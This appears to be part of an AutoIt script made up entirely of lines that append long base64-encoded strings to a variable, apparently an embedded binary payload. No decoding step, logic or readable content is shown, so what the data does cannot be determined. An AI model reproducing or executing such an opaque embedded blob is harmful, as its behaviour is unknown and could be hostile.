	$bdata &= "eDVodAXwn5aPRWiQezJwoFJSlx04UOEfBE8wagg44NAQ4u2eK4XSfTrdi0cwcSYxnssoLEfsgQ+sohE9HJ6mNcR0INsaaBAMPEIZO3B8K8pBAhkmYxiKsBqhQL+xcDlvUNaPGdnSNsYZmDDcOI7aa5zhGD9OGggho2nGfwGsR3Y4G9jlqSo0gg/gDAFu6geeWkEbiBB0fCw2AqanJzjr9mcUrSiGwegD6OsYSr/maZoQDBg8FDNEAwAd3KnYoxhnJT4brETgkxQDyAMtD5JO+EQ7j4C9F/Qh4Tt3MP16+EInAOiS2AhdWGF5fM4FkgoPRwlQtILPtgTxACZqEKMERI44CEVzfB5MBB+4dUAtTlwDw60MLAY/esTgmQXHIOsdHC34eKBKFHULpggNvbN4JI8iuyglWErAWRse2hzMI3WCMijX4eJaBPMJIYYQ0OgDOC8isIVjnEd+Pl9Y00XC7ztfduqMFpmLFiGBtEOiVVBx2qjo8LsUz"
	$bdata &= "Xbq8G0h0L30A+47XKiiB3zCFB4JpakDvGTgR7w5bkxXOONqgSCleHw6MPRCDLZHCaiMKCWA09PDKD4rMoFvBb0RApt9CyIbpo5XlyQsCEcLxaEOgCshakfbOQA9oiAH9h7qG0Oez+IgUTkJaTY3jeKKSiXZlTAjBYCAcDBYpAAQCrByKIGQTNVBFIA2g3QeUx9XmtmFBwjwf6abNXr1elH+UOZ1IaM4cC2Wlp74hGgKvMwU5w3QlIqJbHMlIeOfgBRyuwTfEMuxvWEfMwzckwhorCdJ22od6Ax8VB4FcMIUTQ1BuFbvToFvhNsz9LBDdIn4MBKweyyBShAy1b9iIYyS0AjNQAk3wo1+KIzef4kmQh2O61omItBNE4V1JQTqDJBchKpTRc+AUS9QwXUoxj6PCGjaWMwKLDC9eq1Kj4cMdQ9tTXv9O0H0D48BneuKUoh+dL9Y18Au6HOhgrmLBYRbBoJG+RgdGbqg8wOZAKN6E0yURKzV5a"
	$bdata &= "AuOPgUYIZCABbrUryNUEAQkP+yGkuF2w+PdicvRNk2VcnDu8vlsNFtsdEwaYY+d2qk9tHKi8sD6V7FjcUCpRy7dRScAnEYHhTK62M1Qyt/AvYgWuco3wLIiBfBzohq8zP/HjfBUExRPiU1PwjHLhKI/9UCPDbIWsAToKzToyX8nW0RlDvH***CILj4ib5Ph3gMiHxY2FOYO3MDeIzPXgSC70mDZraEIFUIgC47Rw6rpdiDvAJgoPW5PSELcA4phwXtttBXCZ9vSqTVO98Zi3nh35bwBI2H/8b4DHcw9QTsMf85AZ4MjbgKODaqShLZ1CocadW+/wS7ysjMTQUAGgu3aRnxC/0OilkIgeVKgPsSiFp8gXW3pgkBGXl1Jq8Pv8jWhxVVXnioER3QhdJ4NG2zZrZU3lLBscFQ6VqNkWTwQhBpwy+odOVuDXc3D7aAyhh0zBHtQJIMZF3IeOHFI1+mGEKADUZMPXcVp3wV0HRnrJVXy/ZUyYD"
	$bdata &= "HU5fFiQ8dpPaXgdIaPp4jAwd2SO3Bo1xQe8BAa42Ai2SafjskGF4sdAt9bXVY7DkicE4cHEtR1NpcS7NgE19LAphhsDG+YgC1I554azRUfz7P9jCQMgwGF2BOdwBhhwsUcQIBAjJFjcU/XwHes5ZML70QHwp1A1UaSYH2QmgIbY1AGvlv338F3gvRovH7dRcrvogvMNMZvYQyxRiMeSCsAtG/NOgpmAEwZ0TnRy8aXUB3oQYOA2iEMKecvha+FHXEDF8BU6lEPBKIHDC14Yk7hCO1KC2cIKCQfgt0SO+zTC0sljxmkNtYowAbNyfjNPpAXVFMJmD7SCw8dQ0dVr1ojIBAiCn2SuAjAXRbdBgoDVJJaCgSsKyUyazXdX58PIXOwRiEB2Bfx9daGMSCpTvwZeFdrFdWdQ4ByEAJMYATYEbLV9PACoWBC6gsoGQVTV8f4R/WAfesq2gVWAX8eTJgjQRRX3hew5M77Q/bjRRIHFbaVHJmGH/R"
	$bdata &= "M8ySXvIB+OxNnGFmlIEQeSTJEP8/7i/TCEYIiIz3xxL4SxxSuhUZPA2MQuPIGhPsKQBkI31F/9FYQvAs6ZwLbTWAEDER06mDsAiLs8KLahif0Z4AjJWq/6CkALNkV7pGZBx2WYRGHssF4UyJrDAC7sIZ4cdoDFUEUulL2FQd/1zID46xjBQwRr/d6AbDtYzKJuPSqWVI4csdwK/VngldpvnwOVobmAXh9HQ5QRiSepSzCOEyBABaiCCuRg+sIe3S3kdWcCJQUgv3CDwwjbaCAslPbSRcaDfUyU9K23sDqq0TagCOuJaOY6tY6QyL/CyEZIZqmi55AuwaLlK3Dn+wwJHvNS05XiB05HECt3QILHUdezvDsKUFDBYEeQLtE4Wsz30nMJKnZCh0hweJ1ih3TgRXFBwNOIGNpY9xpEL3QxzIEJpWo1BkWAlqopAHiCIVI1kalVbMbrcAiIgE8BHEd1qgx9ou/BvsCzmMX4vFhCwYhZ3CTjgFX"
	$bdata &= "0cZ5lR9PO6jBA9gWg8ULDR0BUFxeKOzjn5uOsFaJH2El4DNHgx4XtSaQZHjgVOZGO4WFw9MDkUMs1+4OMOg8+Awv04sGAkkGp97LgouaQKqqQWEi0KJGiOVmoFVnyStAWkf0WRkU5LZvSCBFKCwr4IHNBfFGAFhHMFJS74ngZGwad0YDjwIfWPqNXXI4iYRXBsAD8ZEygUt9sMJuZReGygOW1KOCZsSyE90NuAFZoWFrTCl6wdTbwj5s2oAiW/GxYAUtiAcCdCB5E4fAh7c0ghARKjSX3EMBJk/NCdheX6TNVQkNFJMjANqLR5b1OZSmjsQRfCxgdWHxIPnBAFW0uieXr9gLZkuyP9tYkL3hmZo5I6kAhn8Uh1SS6eCwDQLEjCXNnokuhHLY+tEfvxq/Usy20vr6wkQGE4LszXj6ajq3hlppsyvJDFYfECShGpxxyiesP1ZeBgMEDy4VlUA9+kN6kQSEVBo/7D04cr5zfkCaGxQAkBjI7"
	$bdata &= "XCB5Sasy+EKcLSPIj/GhyFV6y+BSNo+VLatJbwdHwI7YvG4DESw8Y7L3wZclHNbB4FfVO8VzUOEwcSWRQsxu4GY40EGm11t24jq3rgm1g8sSYMk/IQmgcE6p8ExIM9AkkIbeNReCxQL8PaOvgd2MGCpnZQi4PeK5SpHJwEHLQdKhsAJTjYP1NwS+CzK0cD0vfqNfhXK3gg6F/i8lPB7h9RA/JnVjYaFGtZ0F0mIl4SlvBQXA40DDrjmB83bAJG/5n2M/f5goQPbTgmzNutgEUOQKFz/IKRE99TIQx8GiheODvCHn/qId2Dusp/I3RJAI8N2+saX44EPkth7Px9Zw4mocIqB/7TFEotXB47wPgkbwzNyEMwA9u4ELbwbgnBK8N3CAV0kw89DBPaxgYuFHPU9DCXAh5PBGHQkqbSwkR8QQChyj3CuKDEv2GEF42IgW91CzgQSBclVSzgJSB9dHtljFzSfge//4ZlUI8cfABIK5IVAHdrZUt"
	$bdata &= "TOFGJnrUQLjA3F1sdPBsjrR9iAhBxMbO08/jNccS0mSQyAPQrzwH88lHNz4vYA8MPrwIyHayGKzcyUvDIbH4KT4vQxOCHtT6lVxOfBGV+JJUFxRsldBt+lTGSsOAyUg+eMm1whB4MJMNbeSBOyRX/AiBMAKHxCtI4nwxCIQ8CIEx0a6zAFvGSh0CbkAoG5mm+T5ghXzWFwx8CJiw8nwB50mhqCDP/1MGNIZJidNQUVk0pCyoozFLfmt9ihAQpfn8Bn0wMNn5coJ3lISO0FlQE4RMasPdWQG5jCjCoRkCtdYQAZwUFO+fMVOt+JH1UPB0ofGaT7pA9NDs+tCAEZIXwMF8PnCLAP30w9GjTpRRpnyHB94hQBApEWROYpghICgxMOCgAK+Ap4fLkolFBnBhGgDkBKAovUO+d566cIi9ECF1GDE4EziREr9BsT8ZeFBhQRn4gDBCexLMwTsksCP1VFhZjBCvCPU7GWAYw/8BBaAj+DvAPPJAQ"
	$bdata &= "w4oCzAPPxGiFhmDSbiREouzPlMp0GlVSVmVg9noGyLhnwQUbAWb9Gk5ymhegEuIVbiuSoUjOJHV0OJZ0IfRYWepuTgwr/otgMJ4kA0Y8X4vQA1YguHjit+ZWMPAswYU0ewVq0SZfcCn0si4UPwy4g8IXiF4833QNagkN4dmfNccE6wtqChmNXwT3RQa+PlEyHCvKA8kD9vs/fCvRiROLzlIQA8Ar0IkXFxwDKpaCtt9TCFcUAyhXCHKNV+IA3wwa2IAXRVlRwgcE0wpMvQthgksSlj6BwppLWAJqPbTtw63JwX/n2jyQIVAKACrwW9AmbNo4V0rHfFFEpzDquwsekmCGJIDDoxnvQlrJE9IlYKPkQRNwx/8Lk2BYjsxOWqSweIYGqNUuJyllBkcI/s/kOSKB9AxYWMajdBxWWTkhm5F3vlB4UJwJ0y0N7QyH0JciHpBo6gBDE5vwBxgW9kcEEAa2fICusi85SOKJTxg78SWkv2JXO/AUA"
	$bdata &= "ZMY/jAnHiQksJXyHIAvSFQgmSRfEhF4Mi8naNIoPKbeCOK1BEfTp74EnNUKCHVgWYUiMFh87ivImFrSdAD4LY0bnAR8j0ffK60U4TMhTsgG6wx2ILov7MwaBk1FAz1Dd4ZFg2Y7c4h9bnnPu8ZkJAzWEHlATYOBDEMDg7XcKUHrCAvO2ySC7d50UDAKcHAEy4APqSG/5TjIQcajLPEtSXdwP20qjCOM/L6xiDIcpU4HMN4VAFNgOSFd+rvpaSesX14s2BAGedLcPCZ+koPFTFyDe1wAxmoI1w0TAr+Zl1/mNlgCahR1IhZDAqUTht+196aaPlcFo7XrJENrdKQyAQqkRJBQIzhjxzPMrAB1Rp9LWOMDLh0S+YQ8MbXYDZfOk1N2xOEogtxYHT0iGrkMPYcX6RCA8tkC898ksFOamSu8a4iwa2WzXiD3pcMEjEUfAxqQBmhMSBddG6Gf+rf1eYDTLAHLBGQ1DChUKDBarWSsIOEJSH2LUE"
	$bdata &= "k0mjoovCShXeRSEjSH2ie4Dw8pXEIlLBzrGRgcJgBfMJHA8yntEju0HH04xGbXVDQOCDh5qreMnZ0+5ONb4oK1H3z7O14kdHE8iO5m5ERTV1ec2skChBICHHq1lZd+zV6qOJD3aQINpAWDoqPiS1aL9jz2ONJEhnbm2HyQgUpBg+96hnXBQLiYQA34TzCJXzR8UsTYwSsJH4VfWzdRGlQYp0ixTm6IwSIKuAz6PAIpWrPwtXV4hnRrNiY0QIhR2fxewGUDsr6LywfdVxUWzRID6jI4cAUNplcyyhDMAngGA0l7LfyBFsCXgvY+XccGtUJsoQMkAYkRwJnBam5PbF8iIBehGaBR8AkdEoQUA28QaIwfLDBtD4XwGRjwiDJRjogDdRIlInRBVEHAgXvcBCp+Gqxr1EpRIHgFDjwQDBHuFr1TxAVDgjW0waTgKLjRMh64WPTwDJxObCYeg+BuozU1HI7QuM0ptH73MPfihcHqAy0AAmY1fHC"
	$bdata &= "I5xdlWlCjXVtGeDsSp1d2yNBXSaDNf+F2AjY20P0lCYcyXb5XIGhF+nA6wiXdEBg893i4YCgdagBRzzC4Fba1wkPpFJAqWVwIUAzBEBBaDqAOFC5B86xA4SrQHEd7JK/9Clu9uBUvPIM+aEA7goEtaPbIXTjYRRxRQCChQL6KTF8CKjxuhDi1f9UMME4FJQBOBx5mxRh1Z/AgesAxLqiWvlLtIDxBbDiGxM9iMYmnzBNLDGD5Cc/E0AlixRfPMhoHyhBfeFEydYqmBQ6BEcDjjVYflyBc4IPk+K8ccn0VY4N/mtn8RfZYqgAwhDBNIFgGwEklDNxDIKcTgldUyrwECUl4KQ3hIxrAQ/6LS+QClFi3WswGEXiUs3ffhHPiU34rwU0ESxmhSFI8Vn0bMsm8ibN1EAw8UQ1yDdUNnWLuyAgIUnO73hiJEQgQiRAc3+gN6qpP5pk7TyR9FlunX/bHR1A8rdVXJJdcNCh8WlNGnhU9ASSJMkJb"
	$bdata &= "ZOTSaDQ+Ajg06/I2OLciNDB9CXvrQEY/MDDuMgMwgN4EO0XYVn0U3Lg2pZkAc86tMBCkXdR+zQSOYygrsDsufmFWEpwQxojdKOzyl5DQqNxHcDKJGxrAAb90TsN5eA4YAZogYI0GPvRRTRdKM3EdBcuuM3tD1OE3i4N7UGnHHQGwMAqCi8bVYNnP2/fYv7kYAI7CAjx0D/WIsILQOMssrKoqAbxNBlUEFKpnDQnlCrCcJno8TECYKy6MARw5LD8c7Bo4107zHdWUOuRTf1QkOFKyDZiHsYnf797yYKsKKDSPdXK/MPMqSrE1Joxscl89DdJjq9dYd4ubRNcvjIsXC8uXXytEDEvJl13UEgaZILMTdMCIMk4HnR3WyMEHf+sWOixcjU7BodkEYJGEN3ADbg0MoKgVzjVLrzUNGOzotSAYdAvgUJGJ7KL4dIl3UDlX8NlWheII/0EzWk5FAn8CMU1gyJd3GHTM1QRGV08QtzxSucMeEIILt"
	$bdata &= "iih/MGfj8BtCi3GA1BIdnk1rJfWKLk/06ks1UCQYDQgQwEJb35fCeUls0saC7wHQMxSNdHfOpxIpii/1AI2VkENhdO/zCZWMf3bQsdhyQyozvYCGssaC9dcSSuVI7cMJIX/YGgbAiVWbZ0YxnquhsirL4bQHjCVaoIBzB0yuAnhBTl4ZKESruE1eytwjhsW/o1n4wsM61U28DCUHWC5ChpP3In4aDhPAZtBnCRRK3DghhK1cmHQAzEW7MWaAuCYPRAcVEGlGEv1WPKC2tdf0+RDqxEdXDSQQ5fSRulfLT0VkAowP7cuZNw5BFYvm7MO9MZe4QguG+7ILDccJ8loEAKfpAmLx5ur5IIxfT/IpuCaqDDj4D80jQuDQt9eIQdunzcc0/gGyq1Kyz88uPUqUgg/Okwn5JeGflNcU3xDJb4hEs38Hzr1DCyQfMPnAoRUAe1XU0MIwQMdsUUeOG4SvSsGg4r6p/PYfQ4DH3lJ3n4dHgJUGPh/1X"
	$bdata &= "wlpq2I4/wzDMcivrjErTs6vMByFNxvEEYB4OsfOzzDXwWMIAVhA7AaCCwat7koCCyGn3gLhJALeN8IYAJk1CgEt5ITcl6oU3wBs1EhgF//WgVCNFlf/gzyImQ8LNSIeCSZGARZjGQmeSClPJxsEHAEdCMUpHIgsDxkdwVCE06YqUA90cQKhKllYASNiwJa0YB5NnAEL3w3gE0W/zMYqUA8HHQTCxmAsnEZ+hcRxAHS9KId6wDJPboGTDwLS+AyVB/zvCykddioaiFzgZh9oWrsIcwl7yUIBjSKQPCASFoEZFFCwBYgHHgdWNyLmsBrAmLtAbkOEYMx/cjB6RIxNbSXQkgBAPNIK3xxTVgJfCTrZzB/g+ABQ8GGCJssy0hYk1ADfjSCEnIJiCLvSkgeR6HhYFQQHAyD9txyZ1Klybi+XMB8OApoNwZUEzjEwF8Rto1NBOsvKUC7EPDBdQ8PDrmGQtbApxYd0v8/o0vVgBT4Jrnx+kl4/ZQ"
	$bdata &= "EOs7xBbmMAdjgPGzSDUIWYGi2q1TeAU3ARY66Bu79y7fKynUNOZYNjUIB6xMZxuI1F/EwB9IYi60eAMFlXJQBFXgPEZ6AvANCQKTyDoS27axPhmdALpnCSsIEBgWV+MpmK3VvDHIgT0BqAf9HMvJcOjGOyIa4KM9zcobI+bg1UXkeb804NPaHgIC0vAKCQzIhTVyUjIQpqIElfwA50IQ939S4IAdIDj1U6J8BDHlBvN5V4OQJOSFWBAJB7LyDwoO17L0aUJPEuilDMWrYil9VtBmGE3KCX1dwQmyfVAcejCTj+7+GYCHNCVe8bzSw4Hkf1RorkFMkAkKQvJAP/lfEV+RBTRHiQ2y/VQc2SljhZ7aEBKqBIC3nbxhIOAsTcbNAmHeBgAogULkHEZtXhj0JDKQPYD2JD02oSnMSGS6AEm6Atb3zVwgxMCxuTTWGFmQt8t8IcgD5BPksApeUIhMCRhoYmNR6m1ggPNUD1VtXG1rSqAw/KDOh"
	$bdata &= "2o1W7ZzsPhjTjeWp343hS/CGX1cj1cJqRz4MECmQ0EGnPL4cqaDDpRgYlZzrl5SspQoFAihgd6UE3XYkm+sX4LcM3Mwc2xjWawFG9AEQSqCOTIvCU+GhApqSwxTfxniorBQDM/9XElbaUB7+BO3SEn4iMn5IVRe/FtCT/+cUUVdHlnyYsFI25FXi+962okpQUItSrKRkQjJICMbrOfHEK4oQXeC7HSXwiVCrfUNkQHRp4ay9ofvSjVMmoFqgjHTiVdwUGCcefOKGzccUQWikn1g/nD1Bk0dRGCVZUFUYeLuGh4uOCzEKeYWBH0Y4OoBLjgwCJrYYFQYMHSUlH1EYDQJHSY2SRHIMJecAsAGf1UiBc6RSE0wAaxCeBVegdIMyMo4oDgBHPvxkRGyBBwAjhOuLCwC0FbpQA63z0UEFZNKNAo5k1CYFffAC0y4a8LfTPsuzhYFRAhPX4BFYECB2JEegeU2RMBmNjc5Q02C8GDnOBEMNBS2C/"
	$bdata &= "cLYBD4eNYJdeYUY2d+obDB2G1CK3V+gGoQjAMAcU+svgYEQxq//CQ8ZbvtOSI/OA9grnSE0EfGNbEUAk2S1Af7WqlxOu9n8JRfwiYRTQKroWDcB4bh8x2nBicM33HRiggVSXVtpJfoU+gVH0AxxPNUDzwEINDQeV/pQoiJbJYw11HFJA4fCPtcBUARLH0WNQ+Ywf3gsBiYTpQNAdaBWResFFMhAukVFMnAi8evCPLVuUSvlY2EFfISgxgHXHUdPOcalVxU0YMhmy4/0RP+gt+FMNecW/peBv9aNaQGKEYPBfc0PiOUBWzRNBgJO3LdO9MCb1AhMHvkE6AbJFHU6u0gOJuIiQEU4FA4NBYxkdHBR1J6oSHUcEqUNAX0UhjBQRkYJ4+Md2ssfUj1gCk5gyKqYocZwRWESRMeQvAE1NWU3WkJKIj9YBmcvFl4f9lwUO/l1DHgtKbyaQgc3WAUuwqMJaSWdCQ4PhYmHJAcydlNWAfYd5HAlgK"
	$bdata &= "gCdWAiwN8mVJDLW41UdRx3SxuTA+b9KgFwBBS1A0l5GMcoeMltTiheNwaD7jXQHehhzt5kCWDRELw88yuElXD4G5w8sSpKuyMDv2VPlc1ZesOTpdhxrsYrAVGNlh5RUmggUWHB7jgr8E4MiTE+vb3MmaQ5L9ZgNgPGiUE9E7l681gzJlILTgOL2SOZANlL39WoA48kJ+TQV+RTSA7FJd/V2ihqE69MnH9CuMHAPUOyy8QQISTgEBRv9RYGfyjWwgpwC4bRMQQFsFwSAVbnkrCGHsIgbeYbdNBWlyk2BhQBAVtJnBgbPr4JHP0+dAe+rXKWBU8Yia3ZeR59FCgHuqMZJAH9qF3RdQloup0FugXiZAibM/ZGYlhbGv2fZU7imGMhNDXGIsZGl3RsTT7ijFcQoq6U0UjVVRQkPDAVI6iyDZAG68LhcSSOCHQa5vtp4RGehmEHkB5hRY+1hMzW9d3Z1vMgMPCVGFNQV/un8KAQnlv+zhO4TYx"
	$bdata &= "XoSAaSDxTVwlnH4AjH0nM1MSANmRni5egyVDJqPJa61cG1iTjdUbhlCJsn10i0f8bk+GU8aWvKONK4aVNGMWkYEVaQL8nWIBsZb/WGwsTzDiVaweHPWMPZeshZRpa+lBDtRoTVKYGKUxwQFxQvgHCvEMw/DIF29xY1DR2EakgpKak2rtHhykeIe8Q0rYRJbZ+EfZRBG1DcKkF5I7KviFyayc5XmB0X7KOUNqZaQHHT5MqYHnGbEZokabIxFNRNs64Qbf7WeOdjBGJnpWIFEe0yESsIQVTm8aXgVME1ZWBT6WraFz/YC4D7gEfAwJ2Dltl2WKZM/9sWqqxGs4hVxworjGsEAxOP1GO1YGdMmvfZwvQW5sMLHi8VCsvGwCLkCRf1mMUFAIgR/SizPp0P2oSCS1AIA5TLoSvlDBrBdI+RMteAE921BdKb1R1GRBYJA+FveubmpmHaHPnwgJXWRwx+pxLDYNaWxa/0JDmKn5Tagokpks1FfYU"
	$bdata &= "xqtmXLJwkExwINlu6iB5lABkdEg4GJCUxmOyNVl6GOnsAjJKO3QVw3vSlZI+s7r3zxo9pDa8EFyzXA88hXI/pBYg2kYQFHpYgI7G2AaWO02gnwaWwtDqnmg1pFc8gL3sU9eiTiXhQEXIUXt3LN1ukMkDuFAG0PI9z1RYXJp/XP6UJrVhoOj4uHiJeCQutoEbWwKRHKTBUhh9NBwwYEiwu0N6epNIcUS3VgJagU1cwkg1IPIYSPQrSEeWvtNiVNeUbCopU16xSiNmpqhSEaSuzlHrOG4zrHMkPT9rHRr9v9aYXHLIIGhkcL0tKJccND3oCElHMWc1gkx18Sh5as2gnxdPzDF4L5xBLrlwZHTQrdUIv8PyWSt5T8xeWWiaOLEHVZw/WhQLT8iJH1o0DIs3sw0IkacuvgyE5H/+/nUN9kcJEHQHdkYDr17sOJlzCDzwCsAZWsNAkqAWjM/8pGmaRyAAOBocBLbreDhm6hZ0Ca5zwRzY+Fs0Y"
	$bdata &= "P8cGIisVsEv31XMpAtphR4aocFiYJyUuDUyc8itlzy5mzINIQOJ7CYkdqK+QIPg+gU3kEe1wgpIPyFVASVWwY0hUECNAKgOtXTCA6AiSnjXFixVkzt/nagWgIEGywuAUkB6CoC3kgxtFdd/R1NIAit7n9YwBmSQ1ry4UdIDHbucJOwDxnP5CrQk4LhTDOHI2+loF95RD7Z1WMr1r8zy+rGGXhV6lFlIJDUyakbC9IjFRnWhwSwlispvOqVfah2oBHUpU9TPVpyL6M4SqFFy6/CxBNiGtAwwASx1E7oQHDTWHQbpaY/X1RgKGH85z1pESynZbVGgV0NClYL18xEPCGOWpgsYXxbAOERAdQb4RqQWESBWBF81qANJz71g5IjE/ExMLXy9NV8GYP9FmlDv4Dhg2/8WaErvmSNwBFB0BnjOgIFeaFvuTeuC1zWEVcstCEN8EumiwArApYzcWSVYQes0uCA73sYncBR/dkNLSiEG7IgyME6elC"
	$bdata &= "QkESH0PlsFU7HHz8kLwqW1RhRwCkkraGJ8mSF8DdUYUbBSl5iklIMJ6xj4RLCWtCwGPDjXNGDoMDQZUCE8fHC0Wy1SLmSpMXnyaGxQdGGB8Lsg1WoUs2xgR+Eljb+NbIYA7gAn1aqk8UnRD0thsnBuBDsJ3Gc4mpztnGJh4PhrpJxoSgfwoo1w4W1Npvz/lABwMHgP2YoItSE0r0YvYXTd8zccUe1WvFUdQLiZcfRo3TWwloDBHvixdjJB5xR4cLobrlRa3YyIetbF4kWyiOOSJhwRnCAo8bLWANm6ZQQl6o30kDckwUwMdzjLc/nS6IicJIxOjGtHZ6Lkp+ifIpRpjMxuxnmcDaCk94VQjKg1u1yFi5x4JXWtxuJr8Z8ECfJNAqkDGxhNXNLuuMi3HPIIsD/XG5ySTMmBmLC/BgcS+bz7Ld9Y6FtnyDc0MoBCzksfONAhBFAOShFe5uT9CTA4HWBV1TTLobDoSDgweCYUqJMoKyFoJ0P"
	$bdata &= "tQCuNtN1aVUFl69bpqp7ZOC5FSwQ2ttIkK/pFSiQGG6uoQwEm+AXfjeVQfs1OUeZXLCrvBSAA/sKCBaWVVuw2ukk0vVzYSBmb9fu9GkjrCI3hDdFGTZwnKkj8EjbB69ToIKWgwOfqUypfGL18THlMdy5Tm5nPnLkQg8LDq18GZHQRwGRSfxoQulBfx9vON6ULw48kMZrF6yCtYUcJjXQio1hDfs75aXBIA8cAhjIaO+Aj5NJSEq4gl5GKDzw1r4iM5nihidHg4gI7hAP5wPvFIPyD4QSD5wHbHbjAEcDEi07RGOmScT7YODQKFlOymXkGcL2nwVNmQMVoeHZ8tsBzOgTLFGyOXRF3WZpotSPfFJ4ODFADvVEFPL3/FAX7Wu1LauSC/6jsKR9iu1BqA1PZjUizpUDwaCV1G9kEhRzJRBNBL7QE6455KaWvt/8wUu32xoPD4IEzoVXcAQ+vVv8mYJ+GPKzHJBhv1F4kxMzL0FJXFcBPQVeM"
	$bdata &= "01hQGGNaKobJJBNQv0u4kwS3DCBhPdGHA8LzU1FoLYkITCXi19UWCuAXtYMPiCICpJXZN5tDGQJD9MYEGIAMpcbWK6A3+0RueVd0OqAUOwUkGDwsogk5SyYTDU0RIcQsARQUDnZlNSkMKEsB8r6oIVqkZFJM8kLgMhhYMz0EBvUJkMee0W8Df/6B4fAfQCCAexHtF4EtzyTrAwgBDy81Qz8KzTFtxBJusk6kahLrLkywDIJtqk73Sg3LQgl/UQGJSYcrCXlKkg6wNCCM4hEGbgOwJl4QAWyYgYJarNtX2CBK+Q6MHUkEKGFwwmABLAT4kXV4IfQlgTktDWXfNIl+tRH/BAp/g8f6lXZkYQofaEgEtND/wmj/kI1XAo1H/m7cLnSgi0RdNK1t3AFvYAdXQcgs4VVSVU0iebSxLo1DvLiSI+nA6rCYwQkQ5qi5OHQMY78DBsFSwun9C2LhQOp4C6OAG+NoGNpARAqQidToZqV4mfhWFH5tv"
	$bdata &= "sZN4AecoddQ/Hg/bWVO9tgIdUcMMcB0Mzb5gQON8RiOuUy4dZZQe1HIMBny109Lh46gCzhnAPEHdQJcLJb9fJZmGAum+1uzH8Koi7rXHzkhm4e/BxAEWjQGqcIgPpPMUS1hQMjbnLRjyeC7fSZfoYQFBvAi4i0isUuWWowglRhg2RHPQ1fnXz8uQeMamEnZSnx84tcZpZoLRCdDrSxYtE/j9Ni/vGha4EKGwypVynicTn0w9MhtooETMU4512A7bmyUyC8OESxD4P6v3xVWSGEfpzWy0mx9FO1EDxhqVf5O8OrRU8HB0mKsASgnlLW+gbomZTARS5eYCWPHWciUFI0vwuDIgxGfCFDDn8grioXaH2NseXDpQVugn2XsQ07IA1vwXBQkJwsSkw9mUBgpAiY5ToTF5AwRYxFK2qDDG4MoZQmNFf8/PdB9xMf/EP91aAwDW1CEzQYctUsVgSc0+Lv8LQP3VgH5AmYsM4GF2pe/jxWS6TEtnm"
	$bdata &= "40OdUmYO4GfQgbEhYGBDgIp4pG3u0w0e74yAH2wTAHdDgMQKf07e+8No0M9rhnZgD36cH6A/lvBskuSEIqNgC4OY5uYvvN4zjR+ovKwek0ygFMIKZOEr9Xx6ThspP3GtOLWfgRwr6UUOcCdL9JGFjboxyJRGjhDS0GKaiMWI93swQPGEH9EOzSGIGDCp8aEwjFgaWB6KmnPke6elggpyKfZhxHeHQbf2gB/QOmEwaWGwLMztJvfb7TtoBpqgIGsP5vwaDTzr5ab0hZrCzW16S/TLmgxivTUkwJbDnHN/8cm0kshyAlOFIGCKoQU4o4e1kqPKsgVlMDOl0k7aEQkmhQQM9oyEeJ9KMc1YdXI3VtvTADeO+WDiGtx/rBOxOOiu+W+kQoNoRmUQ5M2kG4Yf+Q8n07ai4eamxFjQS8asxBJ5K8mVYmBAQXKp0jsy2H4z9TucJj4wSEbyUJYTRufAx0FI9mA4pvb5r2pD6BB7Vs5+4sg99QBCm"
	$bdata &= "pl3wQAqV/Cg3Zu9wr2gPDhwCUif+O+oZ2TYgP+8cyKIQ1rozWGPjsC5aIfR360Dpfu5dQkC+UNbPLMj0lvEQUL+hhLaKfIhgJxkQJfnzhIPSbQRIB6IGJqFDFaLpiTeoFaCj8+AJn0bUki5ZXfMM3hF+O2FNRVRcsSTS9QHwwU1C0KGfQjf3HUVAxcZa5XHliQxhWYwPFUJQmhpw7gmeprTVdQw7jpC/HMzil8CG6kzbhFiqsaxzrDIuUrjIc1QtXDp8OaExTpyR+R//hdV0Jl2j3SbglgAL6I0MEkVBAMFA+XWf8UH2DrgWIjzuyOCIHV+h8uakROFLBkGswxRKNQdtCDAFpLbJwKeiNmTWkMdT3EOGNG9BubXrXD4xHghrVaxfqU8lvIsFQzEfZSECEYCvIs5Ij4kDURrwB4XhUGkwkJgj92o4WjQpVZV3VlugD/xwQtANgASekzaIFZlCP80RAeLxhPXBbxuOlQJjDZmf3e/HJM8wT"
	$bdata &= "Ge9ERCfYjEaP967zd89MoJ73gwHs+JzQIBDWqMBe1IpFBdgNWNO4neg9CNNx0xwNEgUEdRSIhKop7KyUqndqT/aAwNPFCmr/MWxlghF171SZmF8UnYGE2w+IDtPTQgBe+02LTUuOvr5pOzYZVRYuhfdDbAP0O4UHLHUbVAuD4wSDy1ZzG1hC6wKKFPYFo99A0QiL84O9mDuPEfoDvwW/ApFFIKCfIlFUAyaLXR2CDofBdRm5cgmjHXVuBN7NJ3Ukaov5mQwswImQ0kIYRImFQR5RP9gIfDIhE4dZkCQjJIWG9KC6fGIAgFxoMBzZ+MLIV1KJfUVLpUvlwhXAlPjC97vBQD48NHcAlwE4AnwkME5cwlJLtud8VqCceiF1vG9yolsTAT1X60s58aMJak7ucps8F0HrJGiY9AojiOd1FGDHUCTQM7NRdK40Fv2qI2oUY1GdY1XCORwQM9xjZPCBaJ+MHxR0aLCYEBLhdRzjFGOISHDDBDmwE"
	$bdata &= "dkC6FR8LYIQx7s1K8bBYvm1ewfSEZdgbLpG0FQyATP9AqthWmONNIkmB0GScMUDAnl2sAbPTiBRJhlh1Cnq8tI8B8xRVFJnPOCMdBNE/VBMkHTLgXrMTP0CKD6AyVTRhgHIRRDNAgTBY3ltLJDFBWBQcgIqSBX8PBB0WtPD0RS8sHC/Q1MmpFBIvpiQX9RkSIg/JRmkGdwUGYIOqAGDmAiZZKITmJiU4wax0yA1gWsk/3KsRJzGPTsyvwCQA8lu2DgHcoDkbl2AdAGhjoIcP2ifKydkMwgPxFwUM8CKVH5BIwGYubR1CVkKgIQxzuVyiIyQpiGNqoijRTKF7H/YmpyaqRXIdF5eU5jkQl5TPC5/etEUdAlqBQOqjxy4KdMdEXQLaq8ppJkIS38etQY5eT5REQUdnJybgtsoERCFlBKS/wQyBTffNmDcFN4dv7HYTWG5cR6xU8h3U58CdWxg8kIekAwCdozYyJATcgWwXpzyFMmL2PoCdq"
